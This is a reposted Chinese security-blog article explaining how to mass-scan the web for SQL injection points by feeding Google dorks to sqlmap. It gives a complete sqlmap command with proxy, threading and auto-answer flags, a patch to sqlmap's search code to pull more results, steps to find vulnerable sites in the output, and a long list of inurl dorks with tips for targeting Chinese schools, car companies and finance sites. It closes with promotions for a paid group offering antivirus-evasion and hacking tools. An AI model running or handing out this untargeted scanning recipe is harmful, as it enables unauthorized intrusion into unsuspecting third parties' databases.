谷歌SQLMAP批量扫注入点 | 干货
2023-1-21 20:2:3 Author: 渗透安全团队(查看原文) 阅读量:39 收藏

sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
  • -g 「#谷歌搜索」

  • –proxy 「#代理 (挂了ss就直接代理本地)」

  • –threads 「#线程」

  • –batch 「#自动回复」

  • –answer “extending=N,follow=N,keep=N,exploit=n”「#这个可以对一些特定的问题作出回答,在自动化注入中用」

  • –smart 「#当有大量目标时,这个就只检查基于错误的注入点」

sqlmap 默认测试谷歌前100页,增加页面修改 sqlmap\lib\utils\search.py 中的第63行代码

url = “https://www.google.com/search?”`
`url += “q=%s&” % urlencode(dork, convall=True)`
`url += “num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search”`
`url += “&start=%d” % ((gpage – 1) * 100)

「注释:」

q:搜索关键词`
`num:搜索页面,默认为10,貌似最大是100,改为1000试试看`
`hl:默认问英文en,改为中文则是zh-CN,排除国外的网站`
`complete:全部结果`
`safe:是否开启安全过滤`
`filter:是否过滤重复结果`
`btnG:正常搜索提交`
`start:开始页面

修改 num 值为 1000

扫描完成后切到 sqlmap 输出目录 output ,列出文件树状图

tree /F output >test.txt

打开 test.txt 查找存在注入点的网站,搜索关键词 session.sqlite

「sql 注入点搜索关键词:」

可随意组合
变换 php asp jsp
变量后面加参数 "php?idf=123"
加地区词 行业词 "intitle:重庆学校" "intitle:山西汽车" "intitle:金融"
加域名 "site:.com.cn"
inurl:Offer.php?idf=`
`inurl:Opinions.php?id=`
`inurl:Page.php?id=`
`inurl:Pop.php?id=`
`inurl:Post.php?id=`
`inurl:Prod_info.php?id=`
`inurl:Product-item.php?id=`
`inurl:Product.php?id=`
`inurl:Product_ranges_view.php?ID=`
`inurl:Productdetail.php?id=`
`inurl:Productinfo.php?id=`
`inurl:Produit.php?id=`
`inurl:Profile_view.php?id=`
`inurl:Publications.php?id=`
`inurl:Stray-Questions-View.php?num=`
`inurl:aboutbook.php?id=`
`inurl:ages.php?id=`
`inurl:announce.php?id=`
`inurl:art.php?idm=`
`inurl:article.php?ID=`
`inurl:articleshow.asp?articleid=任意数字`
`inurl:artikelinfo.php?id=`
`inurl:asp`
`inurl:asp?id=`
`inurl:avd_start.php?avd=`
`inurl:band_info.php?id=`
`inurl:buy.php?category=`
`inurl:category.php?id=`
`inurl:channel_id=`
`inurl:chappies.php?id=`
`inurl:clanek.php4?id=`
`inurl:clubpage.php?id=`
`inurl:collectionitem.php?id=`
`inurl:communique_detail.php?id=`
`inurl:curriculum.php?id=`
`inurl:declaration_more.php?decl_id=`
`inurl:detail.php?ID=`
`inurl:download.php?id=`
`inurl:downloads_info.php?id=`
`inurl:event.php?id=`
`inurl:faq2.php?id=`
`inurl:fellows.php?id=`
`inurl:fiche_spectacle.php?id=`
`inurl:forum_bds.php?num=`
`inurl:galeri_info.php?l=`
`inurl:gallery.php?id=`
`inurl:game.php?id=`
`inurl:games.php?id=`
`inurl:historialeer.php?num=`
`inurl:hosting_info.php?id=`
`inurl:humor.php?id=`
`inurl:index.php?=`
`inurl:index.php?id=`
`inurl:index2.php?option=`
`inurl:iniziativa.php?in=`
`inurl:item_id=`
`inurl:kategorie.php4?id=`
`inurl:labels.php?id=`
`inurl:loadpsb.php?id=`
`inurl:look.php?ID=`
`inurl:main.php?id=`
`inurl:material.php?id=`
`inurl:memberInfo.php?id=`
`inurl:news-full.php?id=`
`inurl:news.php?id=`
`inurl:newsDetail.php?id=`
`inurl:news_Article.asp?Class_ID=`
`inurl:news_display.php?getid=`
`inurl:news_view.php?id=`
`inurl:newscat.php?id=`
`inurl:newsid=`
`inurl:newsitem.php?num=`
`inurl:newsone.php?id=`
`inurl:newsticker_info.php?idn=`
`inurl:ray.php?id=`
`inurl:read.php?id=`
`inurl:readnews.php?id=`
`inurl:reagir.php?num=`
`inurl:releases.php?id=`
`inurl:review.php?id=`
`inurl:rub.php?idr=`
`inurl:rubp.php?idr=`
`inurl:rubrika.php?idr=`
`inurl:section.php?id=`
`inurl:select_biblio.php?id=`
`inurl:sem.php3?id=`
`inurl:shop.php?do=part&id=`
`inurl:shop_category.php?id=`
`inurl:shopping.php?id=`
`inurl:show.php?id=`
`inurl:show_an.php?id=`
`inurl:showimg.php?id=`
`inurl:shredder-categories.php?id=`
`inurl:spr.php?id=`
`inurl:staff_id=`
`inurl:story.php?id=`
`inurl:sw_comment.php?id=`
`inurl:tekst.php?idt=`
`inurl:theme.php?id=`
`inurl:title.php?id=`
`inurl:top10.php?cat=`
`inurl:tradeCategory.php?id=`
`inurl:trainers.php?id=`
`inurl:transcript.php?id=`
`inurl:view.php?id=`
`inurl:view_faq.php?id=`
`inurl:view_product.php?id=`
`inurl:viewapp.php?id=`
`inurl:viewphoto.php?id=`
`inurl:viewshowdetail.php?id=`
`inurl:website.php?id=`
`inurlage.php?file=`
`inurlageid=`
`inurlages.php?id=`
`inurlarticipant.php?id=`
`inurlerson.php?id=`
`inurllay_old.php?id=`
`inurlreview.php?id=`
`inurlrod_detail.php?id=`
`inurlroduct-item.php?id=`
`inurlroductinfo.php?id=`
`inurl:news_Article.asp?Class_ID=`
`showproduct.asp?id=`
`showproduct.asp?id=随便加个数字

https://blog.csdn.net/tomyyyyyy/article/details/115688999

翻到文章最底部点击“阅读原文”下载链接


付费圈子

新 年 星 球 免 费 福 利

 转发公众号本文到朋友圈

 截图到公众号后台第1、5名获取免费进入星球

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示


关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247496458&idx=1&sn=16ab4c6a95ff1948824b4aa29c661916&chksm=c1760ea5f60187b387cad962fece3a4a07c5f9e4a4dee51d451ea73b833b7ec4617e7522d81a#rd
如有侵权请联系:admin#unsafe.sh